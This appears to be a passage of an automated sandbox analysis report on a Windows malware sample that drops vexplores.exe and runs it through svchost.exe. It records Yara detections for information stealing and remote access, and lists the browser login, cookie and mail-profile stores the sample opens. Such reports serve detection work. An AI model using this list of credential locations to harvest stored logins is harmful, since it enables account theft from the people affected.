              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Videos\vexplores.exe" Jump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
              Source: kG713MWffq.exeBinary or memory string: Shell_TrayWnd
              Source: kG713MWffq.exe, vexplores.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,4_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,7_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Users\user\Desktop\kG713MWffq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: kG713MWffq.exeBinary or memory string: WIN_XP
              Source: vexplores.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: kG713MWffq.exeBinary or memory string: WIN_XPe
              Source: kG713MWffq.exeBinary or memory string: WIN_VISTA
              Source: kG713MWffq.exeBinary or memory string: WIN_7
              Source: kG713MWffq.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3867759274.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
